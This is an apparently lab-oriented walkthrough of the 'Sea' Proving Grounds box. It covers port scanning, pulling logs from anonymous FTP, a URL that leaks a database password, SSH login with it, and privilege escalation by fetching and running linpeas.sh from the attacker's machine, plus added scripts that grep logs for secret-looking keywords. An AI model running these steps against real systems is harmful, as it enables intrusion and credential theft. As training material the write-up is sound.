Sea Walkthrough

OSCP Proving Grounds Box rated as an intermediate box by the community.

Initial Recon

I use rustscan to quickly identify open ports. Everything after the -- is handed straight to nmap, so passing -sC -sV makes nmap run its default scripts and version detection against the ports rustscan found. This is probably the quickest way to get a lay of the land and pull further information out of each service.

rustscan -a 192.168.214.162 --ulimit 5000 -- -sC -sV

The last line in the image above shows rustscan starting nmap and running the scripts against the ports it found open.

NMAP results.
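Once the scan is done, the open ports drive every later step (FTP, SSH, curl against the HTTP port), so it is handy to pull them out of nmap's greppable output instead of reading them off a screenshot. The following is an added example, not part of the original walkthrough, and the .gnmap line it parses is constructed to contain only the services the walkthrough relies on (it is not the real scan output from the box); rustscan can produce this file by passing -oG scan.gnmap after the --.

```sh
#!/bin/sh
# Added example, not from the original walkthrough: extract open ports from
# nmap greppable (-oG) output so follow-up steps can be scripted from the scan.

# Print "port/proto service" for each open port listed in a .gnmap file.
open_ports() {
    grep 'Ports:' "$1" \
      | sed 's/.*Ports: //; s/[[:space:]]*Ignored State.*//' \
      | tr ',' '\n' \
      | sed 's/^[[:space:]]*//' \
      | awk -F/ '$2 == "open" { print $1 "/" $3 " " $5 }'
}

# Comma-separated list of open TCP ports, ready for nmap -p or rustscan -p.
open_port_list() {
    open_ports "$1" \
      | awk -F'[/ ]' '$2 == "tcp" { printf "%s%s", sep, $1; sep = "," } END { print "" }'
}

SCAN=$(mktemp)
trap 'rm -f "$SCAN"' EXIT

# Constructed greppable output (assumption for this example, not the box's real scan).
cat > "$SCAN" <<'EOF'
Host: 192.168.214.162 ()  Status: Up
Host: 192.168.214.162 ()  Ports: 21/open/tcp//ftp///, 22/open/tcp//ssh///, 55743/open/tcp//http///  Ignored State: closed (997)
EOF

open_ports "$SCAN"       # 21/tcp ftp, 22/tcp ssh, 55743/tcp http (one per line)
open_port_list "$SCAN"   # 21,22,55743
```

The awk field split relies on the fixed layout of each Ports entry (port/state/proto//service///), which is stable across nmap versions; filtering on the state field keeps filtered and closed ports out of the list.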

FTP accepts anonymous login, so I go ahead and download all the log files hosted on the FTP server.

ftp 192.168.214.162
# user: anonymous, password: anonymous
prompt # turns off interactive mode so I don't have to confirm each file
mget *

Foothold

Reading through each log file, log2 stands out: it records a POST request to a database path and notes that something was "exposed in request". I immediately want to hit that path and see exactly what is "exposed".

curl http://192.168.214.162:55743//th4o4p/database.php?cfg_dbpwd

We can also browse to the same URL in a browser to see it rendered.
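Reading a handful of small logs by eye works here, but with more files it is worth automating the triage: pull out every request line that mentions something secret-looking and turn the paths into curl commands. The following is an added example, not part of the original walkthrough; the log format and the sample lines it writes are constructed for this example (only the /th4o4p/database.php?cfg_dbpwd path comes from the page), and the keyword list is an assumption you would tune per target.

```sh
#!/bin/sh
# Added example, not from the original walkthrough: triage log files pulled
# from an anonymous FTP share for request lines that hint at leaked secrets.

# Print "<method> <path>" for every request line, in the given files, whose
# text mentions a secret-looking keyword. Keyword list is an assumption.
find_exposed_paths() {
    grep -hiE 'expos|passw|pwd|cfg_' "$@" 2>/dev/null \
      | grep -oE '(GET|POST) [^ "]+' \
      | sort -u
}

# Turn those paths into curl commands against host:port so they can be fetched.
emit_curl_commands() {
    host="$1"; shift
    find_exposed_paths "$@" | while read -r method path; do
        printf 'curl -s -X %s "http://%s%s"\n' "$method" "$host" "$path"
    done
}

LOGDIR=$(mktemp -d)
trap 'rm -rf "$LOGDIR"' EXIT

# Constructed sample logs (assumption for this example, not the box's real logs).
cat > "$LOGDIR/log1" <<'EOF'
192.168.45.244 - - [10/Jan/2024:10:01:12 +0000] "GET /index.php HTTP/1.1" 200 512
192.168.45.244 - - [10/Jan/2024:10:01:13 +0000] "GET /images/logo.png HTTP/1.1" 200 2048
EOF
cat > "$LOGDIR/log2" <<'EOF'
192.168.45.244 - - [10/Jan/2024:10:02:01 +0000] "POST /th4o4p/database.php?cfg_dbpwd HTTP/1.1" 200 33 "cfg_dbpwd exposed in request"
192.168.45.244 - - [10/Jan/2024:10:02:02 +0000] "GET /login.php HTTP/1.1" 200 1024
EOF

find_exposed_paths "$LOGDIR"/log*                         # POST /th4o4p/database.php?cfg_dbpwd
emit_curl_commands 192.168.214.162:55743 "$LOGDIR"/log*   # one curl command per unique path
```

The first grep selects whole lines, so the keyword may sit anywhere on the line (query string, message text, referer); the second only keeps the method and path, which is what you actually need to fetch.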

SSH is open on the target, so the first thing I test is whether the credentials from database.php get us a foothold over SSH. They do. If they hadn't, I would have gone back to the open HTTP ports we discovered and tried them against any login portals.

ssh nicolas@192.168.214.162

Privilege Escalation

I always check whether the current user has sudo rights, and nicolas is allowed to run the ps binary with the aux argument through sudo.

sudo -l

A quick check of GTFOBins shows no documented sudo privilege escalation for the ps binary. We appear to have write permission on /bin, but I don't pursue replacing ps here. One caveat worth recording: the pinned "aux" argument is not what rules that path out, since a replaced /bin/ps would simply receive aux as an argument it can ignore, so confirm the permission with ls -ld /bin before dismissing it. I'll run linpeas.sh while doing some more manual enumeration.

# Kali
python3 -m http.server 80

# Target
wget http://192.168.45.244/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

linpeas turns up another cleartext password, different from the one we used to log in as nicolas. It is worth testing that password against the root account.

Pwn3d!